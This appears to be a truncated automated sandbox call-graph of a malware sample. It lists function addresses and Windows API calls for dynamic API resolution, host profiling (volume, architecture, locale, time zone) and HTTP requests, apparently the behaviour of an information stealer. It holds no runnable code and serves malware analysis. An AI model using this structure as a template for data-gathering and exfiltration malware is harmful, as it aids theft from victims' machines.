14234->14235 14236 56371c 14235->14236 14237 5645c0 2 API calls 14236->14237 14238 563735 14237->14238 14239 5645c0 2 API calls 14238->14239 14240 56374e 14239->14240 14241 5645c0 2 API calls 14240->14241 14242 563767 14241->14242 14243 5645c0 2 API calls 14242->14243 14244 563780 14243->14244 14245 5645c0 2 API calls 14244->14245 14246 563799 14245->14246 14247 5645c0 2 API calls 14246->14247 14248 5637b2 14247->14248 14249 5645c0 2 API calls 14248->14249 14250 5637cb 14249->14250 14251 5645c0 2 API calls 14250->14251 14252 5637e4 14251->14252 14253 5645c0 2 API calls 14252->14253 14254 5637fd 14253->14254 14255 5645c0 2 API calls 14254->14255 14256 563816 14255->14256 14257 5645c0 2 API calls 14256->14257 14258 56382f 14257->14258 14259 5645c0 2 API calls 14258->14259 14260 563848 14259->14260 14261 5645c0 2 API calls 14260->14261 14262 563861 14261->14262 14263 5645c0 2 API calls 14262->14263 14264 56387a 14263->14264 14265 5645c0 2 API calls 14264->14265 14266 563893 14265->14266 14267 5645c0 2 API calls 14266->14267 14268 5638ac 14267->14268 14269 5645c0 2 API calls 14268->14269 14270 5638c5 14269->14270 14271 5645c0 2 API calls 14270->14271 14272 5638de 14271->14272 14273 5645c0 2 API calls 14272->14273 14274 5638f7 14273->14274 14275 5645c0 2 API calls 14274->14275 14276 563910 14275->14276 14277 5645c0 2 API calls 14276->14277 14278 563929 14277->14278 14279 5645c0 2 API calls 14278->14279 14280 563942 14279->14280 14281 5645c0 2 API calls 14280->14281 14282 56395b 14281->14282 14283 5645c0 2 API calls 14282->14283 14284 563974 14283->14284 14285 5645c0 2 API calls 14284->14285 14286 56398d 14285->14286 14287 5645c0 2 API calls 14286->14287 14288 5639a6 14287->14288 14289 5645c0 2 API calls 14288->14289 14290 5639bf 14289->14290 14291 5645c0 2 API calls 14290->14291 14292 5639d8 14291->14292 14293 5645c0 2 API calls 14292->14293 14294 5639f1 14293->14294 14295 5645c0 2 API calls 14294->14295 14296 563a0a 14295->14296 14297 5645c0 2 API calls 14296->14297 14298 563a23 14297->14298 14299 5645c0 2 API calls 14298->14299 14300 563a3c 14299->14300 14301 5645c0 2 API calls 14300->14301 14302 563a55 14301->14302 14303 5645c0 2 API calls 14302->14303 14304 563a6e 14303->14304 14305 5645c0 2 API calls 14304->14305 14306 563a87 14305->14306 14307 5645c0 2 API calls 14306->14307 14308 563aa0 14307->14308 14309 5645c0 2 API calls 14308->14309 14310 563ab9 14309->14310 14311 5645c0 2 API calls 14310->14311 14312 563ad2 14311->14312 14313 5645c0 2 API calls 14312->14313 14314 563aeb 14313->14314 14315 5645c0 2 API calls 14314->14315 14316 563b04 14315->14316 14317 5645c0 2 API calls 14316->14317 14318 563b1d 14317->14318 14319 5645c0 2 API calls 14318->14319 14320 563b36 14319->14320 14321 5645c0 2 API calls 14320->14321 14322 563b4f 14321->14322 14323 5645c0 2 API calls 14322->14323 14324 563b68 14323->14324 14325 5645c0 2 API calls 14324->14325 14326 563b81 14325->14326 14327 5645c0 2 API calls 14326->14327 14328 563b9a 14327->14328 14329 5645c0 2 API calls 14328->14329 14330 563bb3 14329->14330 14331 5645c0 2 API calls 14330->14331 14332 563bcc 14331->14332 14333 5645c0 2 API calls 14332->14333 14334 563be5 14333->14334 14335 5645c0 2 API calls 14334->14335 14336 563bfe 14335->14336 14337 5645c0 2 API calls 14336->14337 14338 563c17 14337->14338 14339 5645c0 2 API calls 14338->14339 14340 563c30 14339->14340 14341 5645c0 2 API calls 14340->14341 14342 563c49 14341->14342 14343 5645c0 2 API calls 14342->14343 14344 563c62 14343->14344 14345 5645c0 2 API calls 14344->14345 14346 563c7b 14345->14346 14347 5645c0 2 API calls 14346->14347 14348 563c94 14347->14348 14349 5645c0 2 API calls 14348->14349 14350 563cad 14349->14350 14351 5645c0 2 API calls 14350->14351 14352 563cc6 14351->14352 14353 5645c0 2 API calls 14352->14353 14354 563cdf 14353->14354 14355 5645c0 2 API calls 14354->14355 14356 563cf8 14355->14356 14357 5645c0 2 API calls 14356->14357 14358 563d11 14357->14358 14359 5645c0 2 API calls 14358->14359 14360 563d2a 14359->14360 14361 5645c0 2 API calls 14360->14361 14362 563d43 14361->14362 14363 5645c0 2 API calls 14362->14363 14364 563d5c 14363->14364 14365 5645c0 2 API calls 14364->14365 14366 563d75 14365->14366 14367 5645c0 2 API calls 14366->14367 14368 563d8e 14367->14368 14369 5645c0 2 API calls 14368->14369 14370 563da7 14369->14370 14371 5645c0 2 API calls 14370->14371 14372 563dc0 14371->14372 14373 5645c0 2 API calls 14372->14373 14374 563dd9 14373->14374 14375 5645c0 2 API calls 14374->14375 14376 563df2 14375->14376 14377 5645c0 2 API calls 14376->14377 14378 563e0b 14377->14378 14379 5645c0 2 API calls 14378->14379 14380 563e24 14379->14380 14381 5645c0 2 API calls 14380->14381 14382 563e3d 14381->14382 14383 5645c0 2 API calls 14382->14383 14384 563e56 14383->14384 14385 5645c0 2 API calls 14384->14385 14386 563e6f 14385->14386 14387 5645c0 2 API calls 14386->14387 14388 563e88 14387->14388 14389 5645c0 2 API calls 14388->14389 14390 563ea1 14389->14390 14391 5645c0 2 API calls 14390->14391 14392 563eba 14391->14392 14393 5645c0 2 API calls 14392->14393 14394 563ed3 14393->14394 14395 5645c0 2 API calls 14394->14395 14396 563eec 14395->14396 14397 5645c0 2 API calls 14396->14397 14398 563f05 14397->14398 14399 5645c0 2 API calls 14398->14399 14400 563f1e 14399->14400 14401 5645c0 2 API calls 14400->14401 14402 563f37 14401->14402 14403 5645c0 2 API calls 14402->14403 14404 563f50 14403->14404 14405 5645c0 2 API calls 14404->14405 14406 563f69 14405->14406 14407 5645c0 2 API calls 14406->14407 14408 563f82 14407->14408 14409 5645c0 2 API calls 14408->14409 14410 563f9b 14409->14410 14411 5645c0 2 API calls 14410->14411 14412 563fb4 14411->14412 14413 5645c0 2 API calls 14412->14413 14414 563fcd 14413->14414 14415 5645c0 2 API calls 14414->14415 14416 563fe6 14415->14416 14417 5645c0 2 API calls 14416->14417 14418 563fff 14417->14418 14419 5645c0 2 API calls 14418->14419 14420 564018 14419->14420 14421 5645c0 2 API calls 14420->14421 14422 564031 14421->14422 14423 5645c0 2 API calls 14422->14423 14424 56404a 14423->14424 14425 5645c0 2 API calls 14424->14425 14426 564063 14425->14426 14427 5645c0 2 API calls 14426->14427 14428 56407c 14427->14428 14429 5645c0 2 API calls 14428->14429 14430 564095 14429->14430 14431 5645c0 2 API calls 14430->14431 14432 5640ae 14431->14432 14433 5645c0 2 API calls 14432->14433 14434 5640c7 14433->14434 14435 5645c0 2 API calls 14434->14435 14436 5640e0 14435->14436 14437 5645c0 2 API calls 14436->14437 14438 5640f9 14437->14438 14439 5645c0 2 API calls 14438->14439 14440 564112 14439->14440 14441 5645c0 2 API calls 14440->14441 14442 56412b 14441->14442 14443 5645c0 2 API calls 14442->14443 14444 564144 14443->14444 14445 5645c0 2 API calls 14444->14445 14446 56415d 14445->14446 14447 5645c0 2 API calls 14446->14447 14448 564176 14447->14448 14449 5645c0 2 API calls 14448->14449 14450 56418f 14449->14450 14451 5645c0 2 API calls 14450->14451 14452 5641a8 14451->14452 14453 5645c0 2 API calls 14452->14453 14454 5641c1 14453->14454 14455 5645c0 2 API calls 14454->14455 14456 5641da 14455->14456 14457 5645c0 2 API calls 14456->14457 14458 5641f3 14457->14458 14459 5645c0 2 API calls 14458->14459 14460 56420c 14459->14460 14461 5645c0 2 API calls 14460->14461 14462 564225 14461->14462 14463 5645c0 2 API calls 14462->14463 14464 56423e 14463->14464 14465 5645c0 2 API calls 14464->14465 14466 564257 14465->14466 14467 5645c0 2 API calls 14466->14467 14468 564270 14467->14468 14469 5645c0 2 API calls 14468->14469 14470 564289 14469->14470 14471 5645c0 2 API calls 14470->14471 14472 5642a2 14471->14472 14473 5645c0 2 API calls 14472->14473 14474 5642bb 14473->14474 14475 5645c0 2 API calls 14474->14475 14476 5642d4 14475->14476 14477 5645c0 2 API calls 14476->14477 14478 5642ed 14477->14478 14479 5645c0 2 API calls 14478->14479 14480 564306 14479->14480 14481 5645c0 2 API calls 14480->14481 14482 56431f 14481->14482 14483 5645c0 2 API calls 14482->14483 14484 564338 14483->14484 14485 5645c0 2 API calls 14484->14485 14486 564351 14485->14486 14487 5645c0 2 API calls 14486->14487 14488 56436a 14487->14488 14489 5645c0 2 API calls 14488->14489 14490 564383 14489->14490 14491 5645c0 2 API calls 14490->14491 14492 56439c 14491->14492 14493 5645c0 2 API calls 14492->14493 14494 5643b5 14493->14494 14495 5645c0 2 API calls 14494->14495 14496 5643ce 14495->14496 14497 5645c0 2 API calls 14496->14497 14498 5643e7 14497->14498 14499 5645c0 2 API calls 14498->14499 14500 564400 14499->14500 14501 5645c0 2 API calls 14500->14501 14502 564419 14501->14502 14503 5645c0 2 API calls 14502->14503 14504 564432 14503->14504 14505 5645c0 2 API calls 14504->14505 14506 56444b 14505->14506 14507 5645c0 2 API calls 14506->14507 14508 564464 14507->14508 14509 5645c0 2 API calls 14508->14509 14510 56447d 14509->14510 14511 5645c0 2 API calls 14510->14511 14512 564496 14511->14512 14513 5645c0 2 API calls 14512->14513 14514 5644af 14513->14514 14515 5645c0 2 API calls 14514->14515 14516 5644c8 14515->14516 14517 5645c0 2 API calls 14516->14517 14518 5644e1 14517->14518 14519 5645c0 2 API calls 14518->14519 14520 5644fa 14519->14520 14521 5645c0 2 API calls 14520->14521 14522 564513 14521->14522 14523 5645c0 2 API calls 14522->14523 14524 56452c 14523->14524 14525 5645c0 2 API calls 14524->14525 14526 564545 14525->14526 14527 5645c0 2 API calls 14526->14527 14528 56455e 14527->14528 14529 5645c0 2 API calls 14528->14529 14530 564577 14529->14530 14531 5645c0 2 API calls 14530->14531 14532 564590 14531->14532 14533 5645c0 2 API calls 14532->14533 14534 5645a9 14533->14534 14535 579c10 14534->14535 14536 57a036 8 API calls 14535->14536 14537 579c20 43 API calls 14535->14537 14538 57a146 14536->14538 14539 57a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14536->14539 14537->14536 14540 57a216 14538->14540 14541 57a153 8 API calls 14538->14541 14539->14538 14542 57a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14540->14542 14543 57a298 14540->14543 14541->14540 14542->14543 14544 57a337 14543->14544 14545 57a2a5 6 API calls 14543->14545 14546 57a344 9 API calls 14544->14546 14547 57a41f 14544->14547 14545->14544 14546->14547 14548 57a4a2 14547->14548 14549 57a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14547->14549 14550 57a4dc 14548->14550 14551 57a4ab GetProcAddress GetProcAddress 14548->14551 14549->14548 14552 57a515 14550->14552 14553 57a4e5 GetProcAddress GetProcAddress 14550->14553 14551->14550 14554 57a612 14552->14554 14555 57a522 10 API calls 14552->14555 14553->14552 14556 57a67d 14554->14556 14557 57a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14554->14557 14555->14554 14558 57a686 GetProcAddress 14556->14558 14559 57a69e 14556->14559 14557->14556 14558->14559 14560 57a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14559->14560 14561 575ca3 14559->14561 14560->14561 14562 561590 14561->14562 15681 561670 14562->15681 14565 57a7a0 lstrcpy 14566 5615b5 14565->14566 14567 57a7a0 lstrcpy 14566->14567 14568 5615c7 14567->14568 14569 57a7a0 lstrcpy 14568->14569 14570 5615d9 14569->14570 14571 57a7a0 lstrcpy 14570->14571 14572 561663 14571->14572 14573 575510 14572->14573 14574 575521 14573->14574 14575 57a820 2 API calls 14574->14575 14576 57552e 14575->14576 14577 57a820 2 API calls 14576->14577 14578 57553b 14577->14578 14579 57a820 2 API calls 14578->14579 14580 575548 14579->14580 14581 57a740 lstrcpy 14580->14581 14582 575555 14581->14582 14583 57a740 lstrcpy 14582->14583 14584 575562 14583->14584 14585 57a740 lstrcpy 14584->14585 14586 57556f 14585->14586 14587 57a740 lstrcpy 14586->14587 14627 57557c 14587->14627 14588 57a820 lstrlen lstrcpy 14588->14627 14589 57a740 lstrcpy 14589->14627 14590 57a8a0 lstrcpy 14590->14627 14591 575643 StrCmpCA 14591->14627 14592 5756a0 StrCmpCA 14593 5757dc 14592->14593 14592->14627 14594 57a8a0 lstrcpy 14593->14594 14595 5757e8 14594->14595 14596 57a820 2 API calls 14595->14596 14598 5757f6 14596->14598 14597 5751f0 20 API calls 14597->14627 14601 57a820 2 API calls 14598->14601 14599 575856 StrCmpCA 14600 575991 14599->14600 14599->14627 14602 57a8a0 lstrcpy 14600->14602 14603 575805 14601->14603 14604 57599d 14602->14604 14605 561670 lstrcpy 14603->14605 14606 57a820 2 API calls 14604->14606 14624 575811 14605->14624 14609 5759ab 14606->14609 14607 575a0b StrCmpCA 14610 575a16 Sleep 14607->14610 14611 575a28 14607->14611 14608 5752c0 25 API calls 14608->14627 14612 57a820 2 API calls 14609->14612 14610->14627 14613 57a8a0 lstrcpy 14611->14613 14614 5759ba 14612->14614 14616 575a34 14613->14616 14615 561670 lstrcpy 14614->14615 14615->14624 14617 57a820 2 API calls 14616->14617 14618 575a43 14617->14618 14619 57a820 2 API calls 14618->14619 14620 575a52 14619->14620 14622 561670 lstrcpy 14620->14622 14621 57578a StrCmpCA 14621->14627 14622->14624 14623 57a7a0 lstrcpy 14623->14627 14624->13680 14625 57593f StrCmpCA 14625->14627 14626 561590 lstrcpy 14626->14627 14627->14588 14627->14589 14627->14590 14627->14591 14627->14592 14627->14597 14627->14599 14627->14607 14627->14608 14627->14621 14627->14623 14627->14625 14627->14626 14629 577553 GetVolumeInformationA 14628->14629 14630 57754c 14628->14630 14631 577591 14629->14631 14630->14629 14632 5775fc GetProcessHeap RtlAllocateHeap 14631->14632 14633 577619 14632->14633 14634 577628 wsprintfA 14632->14634 14636 57a740 lstrcpy 14633->14636 14635 57a740 lstrcpy 14634->14635 14637 575da7 14635->14637 14636->14637 14637->13701 14639 57a7a0 lstrcpy 14638->14639 14640 564899 14639->14640 15690 5647b0 14640->15690 14642 5648a5 14643 57a740 lstrcpy 14642->14643 14644 5648d7 14643->14644 14645 57a740 lstrcpy 14644->14645 14646 5648e4 14645->14646 14647 57a740 lstrcpy 14646->14647 14648 5648f1 14647->14648 14649 57a740 lstrcpy 14648->14649 14650 5648fe 14649->14650 14651 57a740 lstrcpy 14650->14651 14652 56490b InternetOpenA StrCmpCA 14651->14652 14653 564944 14652->14653 14654 564ecb InternetCloseHandle 14653->14654 15696 578b60 14653->15696 14655 564ee8 14654->14655 15711 569ac0 CryptStringToBinaryA 14655->15711 14657 564963 15704 57a920 14657->15704 14660 564976 14662 57a8a0 lstrcpy 14660->14662 14667 56497f 14662->14667 14663 57a820 2 API calls 14664 564f05 14663->14664 14665 57a9b0 4 API calls 14664->14665 14668 564f1b 14665->14668 14666 564f27 codecvt 14669 57a7a0 lstrcpy 14666->14669 14671 57a9b0 4 API calls 14667->14671 14670 57a8a0 lstrcpy 14668->14670 14682 564f57 14669->14682 14670->14666 14672 5649a9 14671->14672 14673 57a8a0 lstrcpy 14672->14673 14674 5649b2 14673->14674 14675 57a9b0 4 API calls 14674->14675 14676 5649d1 14675->14676 14677 57a8a0 lstrcpy 14676->14677 14678 5649da 14677->14678 14679 57a920 3 API calls 14678->14679 14680 5649f8 14679->14680 14681 57a8a0 lstrcpy 14680->14681 14683 564a01 14681->14683 14682->13704 14684 57a9b0 4 API calls 14683->14684 14685 564a20 14684->14685 14686 57a8a0 lstrcpy 14685->14686 14687 564a29 14686->14687 14688 57a9b0 4 API calls 14687->14688 14689 564a48 14688->14689 14690 57a8a0 lstrcpy 14689->14690 14691 564a51 14690->14691 14692 57a9b0 4 API calls 14691->14692 14693 564a7d 14692->14693 14694 57a920 3 API calls 14693->14694 14695 564a84 14694->14695 14696 57a8a0 lstrcpy 14695->14696 14697 564a8d 14696->14697 14698 564aa3 InternetConnectA 14697->14698 14698->14654 14699 564ad3 HttpOpenRequestA 14698->14699 14701 564ebe InternetCloseHandle 14699->14701 14702 564b28 14699->14702 14701->14654 14703 57a9b0 4 API calls 14702->14703 14704 564b3c 14703->14704 14705 57a8a0 lstrcpy 14704->14705 14706 564b45 14705->14706 14707 57a920 3 API calls 14706->14707 14708 564b63 14707->14708 14709 57a8a0 lstrcpy 14708->14709 14710 564b6c 14709->14710 14711 57a9b0 4 API calls 14710->14711 14712 564b8b 14711->14712 14713 57a8a0 lstrcpy 14712->14713 14714 564b94 14713->14714 14715 57a9b0 4 API calls 14714->14715 14716 564bb5 14715->14716 14717 57a8a0 lstrcpy 14716->14717 14718 564bbe 14717->14718 14719 57a9b0 4 API calls 14718->14719 14720 564bde 14719->14720 14721 57a8a0 lstrcpy 14720->14721 14722 564be7 14721->14722 14723 57a9b0 4 API calls 14722->14723 14724 564c06 14723->14724 14725 57a8a0 lstrcpy 14724->14725 14726 564c0f 14725->14726 14727 57a920 3 API calls 14726->14727 14728 564c2d 14727->14728 14729 57a8a0 lstrcpy 14728->14729 14730 564c36 14729->14730 14731 57a9b0 4 API calls 14730->14731 14732 564c55 14731->14732 14733 57a8a0 lstrcpy 14732->14733 14734 564c5e 14733->14734 14735 57a9b0 4 API calls 14734->14735 14736 564c7d 14735->14736 14737 57a8a0 lstrcpy 14736->14737 14738 564c86 14737->14738 14739 57a920 3 API calls 14738->14739 14740 564ca4 14739->14740 14741 57a8a0 lstrcpy 14740->14741 14742 564cad 14741->14742 14743 57a9b0 4 API calls 14742->14743 14744 564ccc 14743->14744 14745 57a8a0 lstrcpy 14744->14745 14746 564cd5 14745->14746 14747 57a9b0 4 API calls 14746->14747 14748 564cf6 14747->14748 14749 57a8a0 lstrcpy 14748->14749 14750 564cff 14749->14750 14751 57a9b0 4 API calls 14750->14751 14752 564d1f 14751->14752 14753 57a8a0 lstrcpy 14752->14753 14754 564d28 14753->14754 14755 57a9b0 4 API calls 14754->14755 14756 564d47 14755->14756 14757 57a8a0 lstrcpy 14756->14757 14758 564d50 14757->14758 14759 57a920 3 API calls 14758->14759 14760 564d6e 14759->14760 14761 57a8a0 lstrcpy 14760->14761 14762 564d77 14761->14762 14763 57a740 lstrcpy 14762->14763 14764 564d92 14763->14764 14765 57a920 3 API calls 14764->14765 14766 564db3 14765->14766 14767 57a920 3 API calls 14766->14767 14768 564dba 14767->14768 14769 57a8a0 lstrcpy 14768->14769 14770 564dc6 14769->14770 14771 564de7 lstrlen 14770->14771 14772 564dfa 14771->14772 14773 564e03 lstrlen 14772->14773 15710 57aad0 14773->15710 14775 564e13 HttpSendRequestA 14776 564e32 InternetReadFile 14775->14776 14777 564e67 InternetCloseHandle 14776->14777 14782 564e5e 14776->14782 14780 57a800 14777->14780 14779 57a9b0 4 API calls 14779->14782 14780->14701 14781 57a8a0 lstrcpy 14781->14782 14782->14776 14782->14777 14782->14779 14782->14781 15717 57aad0 14783->15717 14785 5717c4 StrCmpCA 14786 5717d7 14785->14786 14787 5717cf ExitProcess 14785->14787 14788 571913 StrCmpCA 14786->14788 14789 571932 StrCmpCA 14786->14789 14790 5718f1 StrCmpCA 14786->14790 14791 571951 StrCmpCA 14786->14791 14792 571970 StrCmpCA 14786->14792 14793 57187f StrCmpCA 14786->14793 14794 57185d StrCmpCA 14786->14794 14795 5718cf StrCmpCA 14786->14795 14796 5718ad StrCmpCA 14786->14796 14797 5719c2 14786->14797 14798 57a820 lstrlen lstrcpy 14786->14798 14788->14786 14789->14786 14790->14786 14791->14786 14792->14786 14793->14786 14794->14786 14795->14786 14796->14786 14797->13706 14798->14786 14800 57a7a0 lstrcpy 14799->14800 14801 565979 14800->14801 14802 5647b0 2 API calls 14801->14802 14803 565985 14802->14803 14804 57a740 lstrcpy 14803->14804 14805 5659ba 14804->14805 14806 57a740 lstrcpy 14805->14806 14807 5659c7 14806->14807 14808 57a740 lstrcpy 14807->14808 14809 5659d4 14808->14809 14810 57a740 lstrcpy 14809->14810 14811 5659e1 14810->14811 14812 57a740 lstrcpy 14811->14812 14813 5659ee InternetOpenA StrCmpCA 14812->14813 14814 565a1d 14813->14814 14815 565fc3 InternetCloseHandle 14814->14815 14816 578b60 3 API calls 14814->14816 14817 565fe0 14815->14817 14818 565a3c 14816->14818 14820 569ac0 4 API calls 14817->14820 14819 57a920 3 API calls 14818->14819 14821 565a4f 14819->14821 14822 565fe6 14820->14822 14823 57a8a0 lstrcpy 14821->14823 14824 57a820 2 API calls 14822->14824 14827 56601f codecvt 14822->14827 14829 565a58 14823->14829 14825 565ffd 14824->14825 14826 57a9b0 4 API calls 14825->14826 14828 566013 14826->14828 14831 57a7a0 lstrcpy 14827->14831 14830 57a8a0 lstrcpy 14828->14830 14832 57a9b0 4 API calls 14829->14832 14830->14827 14840 56604f 14831->14840 14833 565a82 14832->14833 14834 57a8a0 lstrcpy 14833->14834 14835 565a8b 14834->14835 14836 57a9b0 4 API calls 14835->14836 14837 565aaa 14836->14837 14838 57a8a0 lstrcpy 14837->14838 14839 565ab3 14838->14839 14841 57a920 3 API calls 14839->14841 14840->13712 14842 565ad1 14841->14842 14843 57a8a0 lstrcpy 14842->14843 14844 565ada 14843->14844 14845 57a9b0 4 API calls 14844->14845 14846 565af9 14845->14846 14847 57a8a0 lstrcpy 14846->14847 14848 565b02 14847->14848 14849 57a9b0 4 API calls 14848->14849 14850 565b21 14849->14850 14851 57a8a0 lstrcpy 14850->14851 14852 565b2a 14851->14852 14853 57a9b0 4 API calls 14852->14853 14854 565b56 14853->14854 14855 57a920 3 API calls 14854->14855 14856 565b5d 14855->14856 14857 57a8a0 lstrcpy 14856->14857 14858 565b66 14857->14858 14859 565b7c InternetConnectA 14858->14859 14859->14815 14860 565bac HttpOpenRequestA 14859->14860 14862 565fb6 InternetCloseHandle 14860->14862 14863 565c0b 14860->14863 14862->14815 14864 57a9b0 4 API calls 14863->14864 14865 565c1f 14864->14865 14866 57a8a0 lstrcpy 14865->14866 14867 565c28 14866->14867 14868 57a920 3 API calls 14867->14868 14869 565c46 14868->14869 14870 57a8a0 lstrcpy 14869->14870 14871 565c4f 14870->14871 14872 57a9b0 4 API calls 14871->14872 14873 565c6e 14872->14873 14874 57a8a0 lstrcpy 14873->14874 14875 565c77 14874->14875 14876 57a9b0 4 API calls 14875->14876 14877 565c98 14876->14877 14878 57a8a0 lstrcpy 14877->14878 14879 565ca1 14878->14879 14880 57a9b0 4 API calls 14879->14880 14881 565cc1 14880->14881 14882 57a8a0 lstrcpy 14881->14882 14883 565cca 14882->14883 14884 57a9b0 4 API calls 14883->14884 14885 565ce9 14884->14885 14886 57a8a0 lstrcpy 14885->14886 14887 565cf2 14886->14887 14888 57a920 3 API calls 14887->14888 14889 565d10 14888->14889 14890 57a8a0 lstrcpy 14889->14890 14891 565d19 14890->14891 14892 57a9b0 4 API calls 14891->14892 14893 565d38 14892->14893 14894 57a8a0 lstrcpy 14893->14894 14895 565d41 14894->14895 14896 57a9b0 4 API calls 14895->14896 14897 565d60 14896->14897 14898 57a8a0 lstrcpy 14897->14898 14899 565d69 14898->14899 14900 57a920 3 API calls 14899->14900 14901 565d87 14900->14901 14902 57a8a0 lstrcpy 14901->14902 14903 565d90 14902->14903 14904 57a9b0 4 API calls 14903->14904 14905 565daf 14904->14905 14906 57a8a0 lstrcpy 14905->14906 14907 565db8 14906->14907 14908 57a9b0 4 API calls 14907->14908 14909 565dd9 14908->14909 14910 57a8a0 lstrcpy 14909->14910 14911 565de2 14910->14911 14912 57a9b0 4 API calls 14911->14912 14913 565e02 14912->14913 14914 57a8a0 lstrcpy 14913->14914 14915 565e0b 14914->14915 14916 57a9b0 4 API calls 14915->14916 14917 565e2a 14916->14917 14918 57a8a0 lstrcpy 14917->14918 14919 565e33 14918->14919 14920 57a920 3 API calls 14919->14920 14921 565e54 14920->14921 14922 57a8a0 lstrcpy 14921->14922 14923 565e5d 14922->14923 14924 565e70 lstrlen 14923->14924 15718 57aad0 14924->15718 14926 565e81 lstrlen GetProcessHeap RtlAllocateHeap 15719 57aad0 14926->15719 14928 565eae lstrlen 14929 565ebe 14928->14929 14930 565ed7 lstrlen 14929->14930 14931 565ee7 14930->14931 14932 565ef0 lstrlen 14931->14932 14933 565f04 14932->14933 14934 565f1a lstrlen 14933->14934 15720 57aad0 14934->15720 14936 565f2a HttpSendRequestA 14937 565f35 InternetReadFile 14936->14937 14938 565f6a InternetCloseHandle 14937->14938 14942 565f61 14937->14942 14938->14862 14940 57a9b0 4 API calls 14940->14942 14941 57a8a0 lstrcpy 14941->14942 14942->14937 14942->14938 14942->14940 14942->14941 14945 571077 14943->14945 14944 571151 14944->13714 14945->14944 14946 57a820 lstrlen lstrcpy 14945->14946 14946->14945 14948 570db7 14947->14948 14949 570f17 14948->14949 14950 570e27 StrCmpCA 14948->14950 14951 570e67 StrCmpCA 14948->14951 14952 570ea4 StrCmpCA 14948->14952 14953 57a820 lstrlen lstrcpy 14948->14953 14949->13722 14950->14948 14951->14948 14952->14948 14953->14948 14957 570f67 14954->14957 14955 571044 14955->13730 14956 570fb2 StrCmpCA 14956->14957 14957->14955 14957->14956 14958 57a820 lstrlen lstrcpy 14957->14958 14958->14957 14960 57a740 lstrcpy 14959->14960 14961 571a26 14960->14961 14962 57a9b0 4 API calls 14961->14962 14963 571a37 14962->14963 14964 57a8a0 lstrcpy 14963->14964 14965 571a40 14964->14965 14966 57a9b0 4 API calls 14965->14966 14967 571a5b 14966->14967 14968 57a8a0 lstrcpy 14967->14968 14969 571a64 14968->14969 14970 57a9b0 4 API calls 14969->14970 14971 571a7d 14970->14971 14972 57a8a0 lstrcpy 14971->14972 14973 571a86 14972->14973 14974 57a9b0 4 API calls 14973->14974 14975 571aa1 14974->14975 14976 57a8a0 lstrcpy 14975->14976 14977 571aaa 14976->14977 14978 57a9b0 4 API calls 14977->14978 14979 571ac3 14978->14979 14980 57a8a0 lstrcpy 14979->14980 14981 571acc 14980->14981 14982 57a9b0 4 API calls 14981->14982 14983 571ae7 14982->14983 14984 57a8a0 lstrcpy 14983->14984 14985 571af0 14984->14985 14986 57a9b0 4 API calls 14985->14986 14987 571b09 14986->14987 14988 57a8a0 lstrcpy 14987->14988 14989 571b12 14988->14989 14990 57a9b0 4 API calls 14989->14990 14991 571b2d 14990->14991 14992 57a8a0 lstrcpy 14991->14992 14993 571b36 14992->14993 14994 57a9b0 4 API calls 14993->14994 14995 571b4f 14994->14995 14996 57a8a0 lstrcpy 14995->14996 14997 571b58 14996->14997 14998 57a9b0 4 API calls 14997->14998 14999 571b76 14998->14999 15000 57a8a0 lstrcpy 14999->15000 15001 571b7f 15000->15001 15002 577500 6 API calls 15001->15002 15003 571b96 15002->15003 15004 57a920 3 API calls 15003->15004 15005 571ba9 15004->15005 15006 57a8a0 lstrcpy 15005->15006 15007 571bb2 15006->15007 15008 57a9b0 4 API calls 15007->15008 15009 571bdc 15008->15009 15010 57a8a0 lstrcpy 15009->15010 15011 571be5 15010->15011 15012 57a9b0 4 API calls 15011->15012 15013 571c05 15012->15013 15014 57a8a0 lstrcpy 15013->15014 15015 571c0e 15014->15015 15721 577690 GetProcessHeap RtlAllocateHeap 15015->15721 15018 57a9b0 4 API calls 15019 571c2e 15018->15019 15020 57a8a0 lstrcpy 15019->15020 15021 571c37 15020->15021 15022 57a9b0 4 API calls 15021->15022 15023 571c56 15022->15023 15024 57a8a0 lstrcpy 15023->15024 15025 571c5f 15024->15025 15026 57a9b0 4 API calls 15025->15026 15027 571c80 15026->15027 15028 57a8a0 lstrcpy 15027->15028 15029 571c89 15028->15029 15728 5777c0 GetCurrentProcess IsWow64Process 15029->15728 15032 57a9b0 4 API calls 15033 571ca9 15032->15033 15034 57a8a0 lstrcpy 15033->15034 15035 571cb2 15034->15035 15036 57a9b0 4 API calls 15035->15036 15037 571cd1 15036->15037 15038 57a8a0 lstrcpy 15037->15038 15039 571cda 15038->15039 15040 57a9b0 4 API calls 15039->15040 15041 571cfb 15040->15041 15042 57a8a0 lstrcpy 15041->15042 15043 571d04 15042->15043 15044 577850 3 API calls 15043->15044 15045 571d14 15044->15045 15046 57a9b0 4 API calls 15045->15046 15047 571d24 15046->15047 15048 57a8a0 lstrcpy 15047->15048 15049 571d2d 15048->15049 15050 57a9b0 4 API calls 15049->15050 15051 571d4c 15050->15051 15052 57a8a0 lstrcpy 15051->15052 15053 571d55 15052->15053 15054 57a9b0 4 API calls 15053->15054 15055 571d75 15054->15055 15056 57a8a0 lstrcpy 15055->15056 15057 571d7e 15056->15057 15058 5778e0 3 API calls 15057->15058 15059 571d8e 15058->15059 15060 57a9b0 4 API calls 15059->15060 15061 571d9e 15060->15061 15062 57a8a0 lstrcpy 15061->15062 15063 571da7 15062->15063 15064 57a9b0 4 API calls 15063->15064 15065 571dc6 15064->15065 15066 57a8a0 lstrcpy 15065->15066 15067 571dcf 15066->15067 15068 57a9b0 4 API calls 15067->15068 15069 571df0 15068->15069 15070 57a8a0 lstrcpy 15069->15070 15071 571df9 15070->15071 15730 577980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15071->15730 15074 57a9b0 4 API calls 15075 571e19 15074->15075 15076 57a8a0 lstrcpy 15075->15076 15077 571e22 15076->15077 15078 57a9b0 4 API calls 15077->15078 15079 571e41 15078->15079 15080 57a8a0 lstrcpy 15079->15080 15081 571e4a 15080->15081 15082 57a9b0 4 API calls 15081->15082 15083 571e6b 15082->15083 15084 57a8a0 lstrcpy 15083->15084 15085 571e74 15084->15085 15732 577a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15085->15732 15088 57a9b0 4 API calls 15089 571e94 15088->15089 15090 57a8a0 lstrcpy 15089->15090 15091 571e9d 15090->15091 15092 57a9b0 4 API calls 15091->15092 15093 571ebc 15092->15093 15094 